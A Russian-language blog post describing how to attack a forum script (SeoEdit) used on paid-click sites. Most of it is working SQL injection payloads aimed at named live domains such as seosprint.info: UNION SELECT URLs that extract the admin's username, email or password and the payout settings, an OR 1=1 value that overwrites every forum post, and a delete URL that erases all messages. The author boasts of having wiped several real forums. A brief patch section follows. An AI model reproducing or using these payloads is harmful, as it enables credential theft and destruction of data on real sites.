Бомбим форум в SeoEdit

Имеем скрипт. Можно за пример взять этот. Посмотрим, что с ним можно сделать…Итак, имеем форум, установлен он на хост, давайте посмотрим, что с ним можно сделать.

На данный момент здесь стоит кривой форум.

Что можно сделать:

1. SELECT:
1.1. http://seosprint.info/forum_posts.php?th=0\’+union+select+1,2,3,4+–+
1.2. http://seosprint.info/forum_topic.php?gr=\’+union+select+1,2,3,4,5,6,7,8,9,10+–+
1.3. http://seosprint.info/forum_edit.php?post=\’+union+select+(SELECT+username+from+tb_users+where+user_status=\’admin\’),2+–+

Выведенную цифру можно спокойно поменять на запрос, поставив его в скобки.

Примеры запросов:
SELECT+username+from+tb_users+where+user_status=\’admin\’ – берёт логин админа, username можно поменять на email или password. Что к чему вы разберётесь.

SELECT+price+from+tb_config+where+item=\’maxautopay\’ – выведем максимальную сумму для автоматической выплаты.

SELECT+payforad+from+tb_site+where+id=1 – если вывело 1 – значит включена выплата раз в сутки.

SELECT+x2+from+tb_site+where+id=1 – если выводит 1 – значит включены автовыплаты.

Другие запросы можно составить самим.

2. UPDATE:
В этом случае можно сделать массовую замену всех сообщений на форуме на свой текст. Пишем что-нить на форуме -> жмём редактировать -> открываем исходный код и ищем:

<input type="hidden" name="idgroupe" value="123" />


123 – номер вашего поста (ID), меняем в исходном коде его на:

' OR 1=1 — '


Вводим текст и подтверждаем.

3. DELETE
Я так убил форум на clickid.ru, да и на goldenclic.ru и seosprint.info wink

Идём по ссылке: http://seosprint.info/forum_posts.php?delete=\’+or+1=1+–+ (у нас удалились все сообщения на форуме)

Фиксимся:

1. Проставим интвалы forum_posts.php:

$adse=($_GET["th"]);
$pagetemp=($_GET["page"]);


Перед скобками проставляем intval, сделать тоже самое во всех файлах форума.

Далее в forum_posts.php:

$id_dell=strip_tags($_GET["delete"]);


strip_tags => intval

Ещё ниже:

$id_post=strip_tags($_POST["idgroupe"]);


Аналогично меняем strip_tags на intval

Теперь открываем каждый файл и меняем оставшиеся strip_tags на limpiar.

И наконец самый главный фикс: ставим защиту от NGS, чтоб наверняка.

И теперь самый самый важный фикс – удаляем форум и букс заодно и ищем девушку да работаем на нормальной работе wink

Автор публикации

не в сети 10 лет

Alex

Комментарии: 0Публикации: 166Регистрация: 19-02-2011

Понравилась статья? Поделись в соц. сетях:

Похожие новости

Отправить комментарий

avatar
wpDiscuz
Авторизация
*
*
Регистрация
*
*
*
Генерация пароля